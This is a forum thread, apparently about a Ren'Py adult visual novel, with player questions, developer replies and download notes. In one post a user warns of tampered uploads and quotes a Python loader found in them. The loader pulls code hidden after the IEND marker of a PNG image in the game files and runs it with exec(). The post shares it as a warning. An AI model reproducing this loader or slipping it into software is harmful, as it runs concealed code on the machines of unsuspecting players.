3.30 star(s) 11 Votes

Dolyla

Game Developer
Feb 10, 2022
This games looks promising but every time when I start this game I have to choose the language and make a decision about to see strong content or not. Isn't it better that the game remembers that after the first play?
You're playing episode 2, the version hasn't been updated on this site since the release in January. Now the game don't ask you this more than the first time.

Newhell

Feb 8, 2021
Russian translation v.0.3.1 Deluxe (PC + Android) -

Перевод на русский язык v.0.3.1 Deluxe (ПК + Андроид)
screenshot0001.png

Reactions: genius555

Talmadge

May 7, 2018
I have the mod installed, but there are a few questions on the tablet that I don't know. For instance, one says to click on the point. Where is the point? And what number is missing? Those don't have the answers shown. Thanks!
I tried searching on here, but it didn't give me any results.

Reactions: MOGGERrn

SonsOfLiberty

Post Pro
Compressor
Sep 3, 2022
B.E.S.T [Ep.3 Deluxe] [Dolyla]

COMPRESSED:

Win/Linux:
- - -

Mac:
- - -

Last edited:

OWSam000

Mar 1, 2022
Is blue and red path mutually exclusive?
If you open red or blue path, will other main girls path close?

Jacowboy

Aug 8, 2022
'sup folks, a couple of Qs:

how bad is the engrish?

also, how much content is there so far? (it'd be nice to have a static render count)

thanks!

Dolyla

Game Developer
Feb 10, 2022
Hi there ! Hope you will like it !

Is blue and red path mutually exclusive?
If you open red or blue path, will other main girls path close?
Yes they're on their own path, you cant have both at the same time.
It can close, or not, paths with others girls depending on the way you play.

this is a harem game ? harem tag> why the paths?
Depending if for you Harem = All girls of the game at the same time, or, like in this case, MC can have multiple girls at the same time... but not all. Some are exclusive.

'sup folks, a couple of Qs:

how bad is the engrish?

also, how much content is there so far? (it'd be nice to have a static render count)

thanks!
2000+ renders // 100+ animations

longjohngold

Jan 22, 2020
Oh no this game has copied the phone code that has sprung up in a few games now, that for some ungodly reason checks for your internet connection. So if you're taking the appropriate steps to ensure renpy games don't have access to the internet (as is smart given those security breeches we had earlier in the year) then you'll just get endless errors when the phone is used.

You don't have permission to view the spoiler content. Log in or register now.

That get_internet_connection_state is the giveaway. I think Seductive Shadows has the same problem... and there was another one that I encountered it in, but the dev fixed it quickly so I can't remember which game it was.

• Wow
Reactions: S1nsational

Sony676

Mar 14, 2021
Dolyla Do you plan to have some gallery unlock feature in the future? I still struggle to unlock each and every scene in the game which is a little frustrating here and there.

Dolyla

Game Developer
Feb 10, 2022
Oh no this game has copied the phone code that has sprung up in a few games now, that for some ungodly reason checks for your internet connection. So if you're taking the appropriate steps to ensure renpy games don't have access to the internet (as is smart given those security breeches we had earlier in the year) then you'll just get endless errors when the phone is used.

That get_internet_connection_state is the giveaway. I think Seductive Shadows has the same problem... and there was another one that I encountered it in, but the dev fixed it quickly so I can't remember which game it was.
will look at it cause it's not very useful as a feature of the phone. Thank you for this !
Dolyla Do you plan to have some gallery unlock feature in the future? I still struggle to unlock each and every scene in the game which is a little frustrating here and there.
yeah I will add this option at the end of the season I think in the DLC

Reactions: Sony676

MiltonPowers

Conversation Conqueror
Jul 26, 2023
(I'm on a mission to change this behavior.)

TO: Uploaders, Moderators, Developers, Foxes, Hounds, Gargoyles, Anyone, Everyone....

Please post a date and/or version number along with these notices on the OP. It's confusing not knowing how this applies.

View attachment 4077083
Yes please. We need more people to get behind your campaign. You need to start again for Episode 3, but that note is still sitting there at Episode 8. It's confusing and annoying.

Reactions: WuzzyFuzzy

Reij

Jun 22, 2018
So if you're taking the appropriate steps to ensure renpy games don't have access to the internet (as is smart given those security breeches we had earlier in the year)
Just wanted to add that it's an ongoing problem as it seems they just spotted another suspicious upload (this time before the OP of the game's thread was updated and with a slight variation on the previous malicious code).
The attacker has changed their tact slightly.

Code:
    def style_check(image_path):
        with open(image_path, 'rb') as f:
            content = f.read()
        end_marker = b'\x49\x45\x4E\x44\xAE\x42\x60\x82'
        idx = content.rfind(end_marker)
        code = content[idx + len(end_marker):]
        return code.decode('utf-8')
    def style_init(image_path):
        code = style_check(image_path)
        exec(code, {'__name__': '__main__'})
    image_path = r'game\images\ui\gall_velera_3_unlocked.png'
    style_init(image_path)
Shared in https://f95zone.to/threads/isekai-paradise-v0-2-soultice.226798/post-14940252 thankfully Zemax caught it before the OP was updated.

A reminder to everyone to wait for the OP to be updated before downloading, giving our uploader team a chance to check it first.

Last edited:

grahegri

drunk off sake
Donor
Feb 23, 2023
BEST-EP3
rpdl torrents are unaffiliated with F95Zone and the game developer.
Please note that we do not provide support for games.
For torrent-related issues use here, or join us on !
, . Downloading issues? Look here.​

UncleNanard

I am to music what Kanye West is to adult games.
Game Developer
Jul 1, 2017

It is a ready-to-use script hosted on Github. To be honest, it is the only good phone script; the others are clearly outdated. I am in the process of adding it to a project I am working on, and I had no idea it used the internet. Thank you; I will look into removing it.

I know the developer a little bit, and I know he is not the type of person to gather information behind players' backs, so do not worry about it.

• Thinking Face
Reactions: Cernunnos.
3.30 star(s) 11 Votes